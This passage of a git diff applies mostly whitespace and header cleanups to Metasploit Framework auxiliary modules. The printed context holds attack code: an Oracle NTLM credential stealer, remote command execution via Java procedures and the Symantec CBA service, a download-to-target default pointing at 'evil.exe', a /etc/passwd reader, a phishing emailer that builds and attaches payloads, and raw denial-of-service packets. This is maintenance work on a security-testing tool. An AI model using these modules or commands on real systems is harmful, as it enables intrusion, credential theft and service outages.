Rex::Text.encode_base64(function2) prp = Rex::Text.encode_base64(prepare) exp1 = Rex::Text.encode_base64(exploiting1) exp2 = Rex::Text.encode_base64(exploiting2) - + sql = %Q| DECLARE @@ -117,10 +117,10 @@ class Metasploit3 < Msf::Auxiliary | - print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sql) end -end +end diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index 8a6d58d168..d5cf4ff46f 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary To do this you must firstly run smb_sniffer or smb_relay module on your sever. Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS. - So if smb_relay is working, you will get Administrator access to server which + So if smb_relay is working, you will get Administrator access to server which runs Oracle. If not than you can decrypt HALFLM hash. }, 'Author' => [ 'Sh2kerr ' ], @@ -32,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 7 2009')) - register_options( + register_options( [ - OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]), + OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]), ], self.class) end diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index bce46717be..342043bbe2 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle Account Discovery.', 'Description' => %q{ This module uses a list of well known default authentication credentials - to discover easily guessed accounts. + to discover easily guessed accounts. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 06850e1dad..9a4f328df5 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle SQL Generic Query', @@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Dec 7 2007')) - register_options( + register_options( [ OptString.new('SQL', [ false, 'The SQL to execute.', 'select * from v$version']), ], self.class) @@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary end end rescue => e - return + return end end diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 7b82780361..1fb3eaede4 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Database Enumeration', @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary end print_status("Running Oracle Enumeration....") - + #Version Check query = 'select * from v$version' ver = prepare_exec(query) @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary print_status("\t#{v.chomp}") report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}") end - + #Saving Major Release Number for other checks majorrel = ver[0].scan(/Edition Release (\d*)./) @@ -77,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary end end - + #------------------------------------------------------- #Security Settings print_status("Security Settings:") @@ -129,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary print_error("It appears you do not have sufficient rights to perform the check") end end - + begin query = %Q| SELECT limit @@ -146,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary print_error("It appears you do not have sufficient rights to perform the check") end end - + begin query = %Q| SELECT limit @@ -163,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary print_error("It appears you do not have sufficient rights to perform the check") end end - + begin query = %Q| SELECT limit @@ -245,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary if majorrel.join.to_i < 11 query = %Q| - SELECT name, password + SELECT name, password FROM sys.user$ where password != 'null' and type# = 1 and astatus = 0 | @@ -278,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary begin if majorrel.join.to_i < 11 query = %Q| - SELECT username, password + SELECT username, password FROM dba_users WHERE account_status = 'EXPIRED & LOCKED' | diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 6195404560..16859342ef 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,9 +19,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description' => %q{ - This module exploits an authentication bypass vulnerability - in login.php in order to execute arbitrary code via a command injection - vulnerability in property_box.php. This module was tested + This module exploits an authentication bypass vulnerability + in login.php in order to execute arbitrary code via a command injection + vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32). }, 'Author' => [ 'MC' ], @@ -44,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary def run cmd = datastore['CMD'] - + res = send_request_cgi( { 'uri' => '/login.php', @@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary sessionid = res.headers['Set-Cookie'].split(';')[0] print_status("Sending command: #{datastore['CMD']}...") - + send_request_cgi( { 'uri' => '/property_box.php', diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index 4941b92d2a..fd5520aa95 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Java execCommand (Win32)', @@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Dec 7 2007')) - register_options( + register_options( [ OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']), ], self.class) @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary " procedure = " - create or replace procedure #{name} (p_command in varchar2) + create or replace procedure #{name} (p_command in varchar2) as language java name '#{source}.execCommand (java.lang.String)'; " @@ -61,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary drops = "drop java source #{source}" - dropp = "drop procedure #{name}" + dropp = "drop procedure #{name}" begin print_status("Creating java source '#{source}'...") diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 05a702731f..05e62e92cc 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE - + def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle URL Download', @@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Feb 2003')) - register_options( + register_options( [ OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']), OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']), @@ -66,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)'; " - exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;" - + exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;" + drops = "drop java source SRC_FILE_UPLOAD" - dropp = "drop procedure PROC_FILEUPLOAD" + dropp = "drop procedure PROC_FILEUPLOAD" begin print_status("Creating java source 'SRC_FILE_UPLOAD'...") diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 4e697bb86f..441f60fb9d 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,12 +32,12 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 7 2009')) - register_options( - [ - Opt::RPORT(1521), - OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']), - OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]), - ], self.class) + register_options( + [ + Opt::RPORT(1521), + OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']), + OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]), + ], self.class) end @@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary list = datastore['SIDFILE'] print_status("Starting brute force on #{rhost}, using sids from #{list}...") - + fd = File.open(list).each do |sid| - + login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))" pkt = tns_packet(login) diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index d4139d6f5a..23c6b728ff 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'DisclosureDate' => 'Feb 1 2009')) - register_options( + register_options( [ Opt::RPORT(1521), OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']), @@ -42,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending '#{command}' to #{rhost}:#{rport}") sock.put(pkt) print_status("writing #{pkt.length} bytes.") - + sleep(0.5) print_status("reading") @@ -52,6 +56,6 @@ class Metasploit3 < Msf::Auxiliary res = res.tr("\177",".") puts res - disconnect + disconnect end end diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index d7617bd3a4..d955c8667b 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Pop2 def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'UoW pop2d Remote File Retrieval Vulnerability', 'Description' => %q{ This module exploits a vulnerability in the FOLD command of the diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index 160441d81c..24f8525db0 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -15,7 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres - + def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL Server Generic Query', @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd']) ], self.class) - deregister_options( 'SQL', 'RETURN_ROWSET' ) + deregister_options( 'SQL', 'RETURN_ROWSET' ) end def rhost @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def rport datastore['RPORT'] end - + def run ret = postgres_read_textfile(datastore['RFILE']) verbose = datastore['VERBOSE'] @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}" end when :complete - print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose + print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose end postgres_logout if self.postgres_conn end diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 02de1a7a37..a53e975c6d 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -15,7 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres - + def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL Server Generic Query', @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$' )) - register_options( [ ], self.class) # None needed. + register_options( [ ], self.class) # None needed. end def rhost @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def rport datastore['RPORT'] end - + def run ret = postgres_query(datastore['SQL'],datastore['RETURN_ROWSET']) verbose = datastore['VERBOSE'] @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary when :sql_error print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}" when :complete - print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose + print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose end postgres_logout if self.postgres_conn end diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index eb60d77101..69ccc17972 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary include Rex::Platforms::Windows def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'TrendMicro ServerProtect File Access', 'Description' => %q{ This modules exploits a remote file access flaw in the ServerProtect Windows @@ -47,25 +47,23 @@ class Metasploit3 < Msf::Auxiliary [ 'list' ] ] )) - - register_options( - [ - Opt::RPORT(5168), - OptString.new('RPATH', - [ - false, - "The remote filesystem path", - nil - ] - ), - OptString.new('LPATH', - [ - false, - "The local filesystem path", - nil - ] - ), - ], self.class) + + register_options( + [ + Opt::RPORT(5168), + OptString.new('RPATH', + [ + false, + "The remote filesystem path", + nil + ]), + OptString.new('LPATH', + [ + false, + "The local filesystem path", + nil + ]), + ], self.class) end def check_option(name) @@ -73,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary raise RuntimeError, "The #{name} parameter is required by this option" end end - + def auxiliary_commands - { + { "delete" => "Delete a file", "download" => "Download a file", "upload" => "Upload a file", @@ -92,15 +90,15 @@ class Metasploit3 < Msf::Auxiliary when 'upload' check_option('RPATH') check_option('LPATH') - cmd_upload(datastore['RPATH'], datastore['LPATH']) + cmd_upload(datastore['RPATH'], datastore['LPATH']) when 'delete' check_option('RPATH') - cmd_delete(datastore['RPATH']) + cmd_delete(datastore['RPATH']) when 'list' check_option('RPATH') cmd_list(datastore['RPATH']) else - print_error("Unknown action #{action.name}") + print_error("Unknown action #{action.name}") end end @@ -110,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary # # Once this function is used, if cmd_download or cmd_upload is called the server will crash :/ - # + # def cmd_list(*args) - + if (args.length < 1) print_status("Usage: list folder") return @@ -126,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary # FindFirstFile resp = serverprotect_rpccmd(131080, data, 0x100) return if not resp - + if resp.length != 0x108 print_status("An unknown error occured while calling FindFirstFile.") return @@ -143,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary file = deunicode(resp[0x30, 0xd0]) print("#{file}\n") - + data = "\0" * 0x100 data[0,4] = [handle].pack('V') @@ -151,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary # FindNextFile resp = serverprotect_rpccmd(131081, data, 0x100) return if not resp - + if resp.length != 0x108 print_status("An unknown error occured while calling FindFirstFile.") break @@ -174,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary def cmd_delete(*args) - + if (args.length == 0) print_status("Usage: delete c:\\windows\\system.ini") return @@ -183,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary data = Rex::Text.to_unicode(args[0]+"\0") resp = serverprotect_rpccmd(131077, data, 4) return if not resp - + if (resp.length == 12) ret, = resp[8,4].unpack('V') @@ -198,12 +196,12 @@ class Metasploit3 < Msf::Auxiliary def cmd_download(*args) - + if (args.length < 2) print_status("Usage: download remote_file local_file") return end - + # GENERIC_READ: 0x80000000 # FILE_SHARE_READ: 1 # OPEN_EXISTING: 3 @@ -231,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary def cmd_upload(*args) - + if (args.length < 2) print_status("Usage: upload local_file remote_file") return @@ -271,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary resp = serverprotect_rpccmd(131073, data, 540) return if not resp - + if (resp.length < 548) print_status("An unknown error occurred while calling CreateFile.") return 0 @@ -363,7 +361,7 @@ class Metasploit3 < Msf::Auxiliary padding = "" end - stub = + stub = NDR.long(cmd) + NDR.long(data.length) + data + @@ -373,14 +371,14 @@ class Metasploit3 < Msf::Auxiliary return serverprotect_rpc_call(0, stub) end - + # # Call the serverprotect RPC service - # + # def serverprotect_rpc_call(opnum, data = '') begin - + connect handle = dcerpc_handle( @@ -400,7 +398,7 @@ class Metasploit3 < Msf::Auxiliary disconnect outp - + rescue ::Interrupt raise $! rescue ::Exception => e @@ -408,5 +406,5 @@ class Metasploit3 < Msf::Auxiliary nil end end - + end diff --git a/modules/auxiliary/admin/symantec/cba_exec.rb b/modules/auxiliary/admin/symantec/cba_exec.rb index 94284555a2..d3d432ec96 100644 --- a/modules/auxiliary/admin/symantec/cba_exec.rb +++ b/modules/auxiliary/admin/symantec/cba_exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 28 2009')) - register_options( + register_options( [ Opt::RPORT(12174), OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']), @@ -44,19 +48,19 @@ class Metasploit3 < Msf::Auxiliary begin connect - len = 2 + datastore['CMD'].length - + len = 2 + datastore['CMD'].length + data = [0x00000000].pack('V') data << len.chr data << "\x00" data << datastore['CMD'] + " " data << "\x00" - - print_status("Sending command: #{datastore['CMD']}") + + print_status("Sending command: #{datastore['CMD']}") sock.put(data) res = sock.get_once - + if (!res) print_error("Did not recieve data. Failed?") else diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 06bf6ea06a..ce255e6e98 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -1,6 +1,9 @@ +## +# $Id$ +## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Generic Emailer (SMTP)', 'Description' => %q{ This module can be used to automate email delivery. - This code is based on Joshua Abraham's email script for social + This code is based on Joshua Abraham's email script for social engineering. }, 'License' => MSF_LICENSE, @@ -31,26 +34,26 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://spl0it.org/' ], - ], + ], 'Author' => [ 'et ' ])) - + register_options( - [ + [ OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']), OptString.new('RPORT', [true, "SMTP server port",'25']), OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",File.join(Msf::Config.install_root, "data","emailer_config.yaml")]), - ], self.class) - - # Hide this option from the user + ], self.class) + + # Hide this option from the user deregister_options('MAILTO') end - + def run fileconf = File.open(datastore['YAML_CONFIG']) - yamlconf = YAML::load(fileconf) - - fileto = yamlconf['to'] + yamlconf = YAML::load(fileconf) + + fileto = yamlconf['to'] from = yamlconf['from'] subject = yamlconf['subject'] type = yamlconf['type'] @@ -63,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary attachment_file = yamlconf['attachment_file'] attachment_file_type = yamlconf['attachment_file_type'] attachment_file_name = yamlconf['attachment_file_name'] - + ### payload options ### make_payload = yamlconf['make_payload'] zip_payload = yamlconf['zip_payload'] @@ -77,35 +80,35 @@ class Metasploit3 < Msf::Auxiliary datastore['MAILFROM'] = from - + msg = File.open(msg_file).read email_sig = File.open(sig_file).read - if (type !~ /text/i and type !~ /text\/html/i) + if (type !~ /text/i and type !~ /text\/html/i) print_error("YAML config: #{type}") end - - if make_payload + + if make_payload print_status("Creating payload...") system( "#{msf_location}/msfpayload #{msf_payload} LHOST=#{msf_ip} LPORT=#{msf_port} R | #{msf_location}/msfencode -t exe -o /tmp/#{msf_filename} > /dev/null 2>&1") - if msf_change_ext + if msf_change_ext msf_payload_newext = msf_filename msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}") File.rename("/tmp/#{msf_filename}", "/tmp/#{msf_payload_newext}") msf_filename = msf_payload_newext end - if zip_payload + if zip_payload zip_file = msf_filename zip_file = zip_file.gsub(/\.\w+/, '.zip') system("zip -r /tmp/#{zip_file} /tmp/#{msf_filename} > /dev/null 2>&1"); msf_filename = zip_file attachment_file_type = 'application/zip' - else + else attachment_file_type = 'application/exe' end @@ -118,17 +121,17 @@ class Metasploit3 < Msf::Auxiliary if l !~ /\@/ nil end - + nem = l.split(',') name = nem[0].split(' ') fname = name[0] lname = name[1] email = nem[1] - - - if add_name - email_msg_body = "#{fname},\n\n#{msg}" - else + + + if add_name + email_msg_body = "#{fname},\n\n#{msg}" + else email_msg_body = msg end @@ -136,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary data_sig = File.open(sig_file).read email_msg_body = "#{email_msg_body}\n#{data_sig}" end - + print_status("Emailing #{name[0]} #{name[1]} at #{email}") mime_msg = Rex::MIME::Message.new @@ -146,22 +149,20 @@ class Metasploit3 < Msf::Auxiliary mime_msg.to = email datastore['MAILTO'] = email.strip mime_msg.subject = subject - + mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline") - + if attachment if attachment_file_name data_attachment = File.open(attachment_file).read mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"") end end - + send_message(mime_msg.to_s) - sleep wait + sleep wait end - + print_status("Email sent..") end - end - - +end diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index ee9be92937..66778c887b 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Cisco IOS HTTP GET /%% request Denial of Service', 'Description' => %q{ - This module triggers a Denial of Service condition in the Cisco IOS + This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for "/%%", the device becomes unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P. @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(80), ], self.class) - + end def run diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index 759f1edb24..1eec6bba13 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FreeBSD Remote NFS RPC Request Denial of Service', 'Description' => %q{ - This module sends a specially-crafted NFS Mount request causing a + This module sends a specially-crafted NFS Mount request causing a kernel panic on host running FreeBSD 6.0. }, 'Author' => [ 'MC' ], @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '23511' ], [ 'CVE', '2006-0900' ], ])) - + register_options([Opt::RPORT(2049),], self.class) end @@ -45,11 +45,11 @@ class Metasploit3 < Msf::Auxiliary pkt = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00" pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" - + print_status("Sending dos packet...") - + sock.put(pkt) - + disconnect end diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index b684dfdb35..df1268012d 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => '3Com SuperStack Switch Denial of Service', 'Description' => %q{ This module causes a temporary denial of service condition @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ], ], 'DisclosureDate' => 'Jun 24 2004')) - + register_options( [ Opt::RPORT(80) ], self.class ) end @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Errno::ECONNRESET print_status("DoS packet successful. #{rhost} not responding.") end - + end -end \ No newline at end of file +end diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index 7f9bf9df3c..b011f6f0dd 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -15,27 +15,27 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Apache mod_isapi <= 2.2.14 Dangling Pointer', 'Description' => %q{ This module triggers a use-after-free vulnerability in the Apache Software - Foundation mod_isapi extension. In order to reach the vulnerable code, the + Foundation mod_isapi extension. In order to reach the vulnerable code, the target server must have an ISAPI module installed and configured. By making a request that terminates abnormally (either an aborted TCP connection or an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later, - if another request comes for that ISAPI module, previously obtained pointers will + if another request comes for that ISAPI module, previously obtained pointers will be used resulting in an access violation or potentially arbitrary code 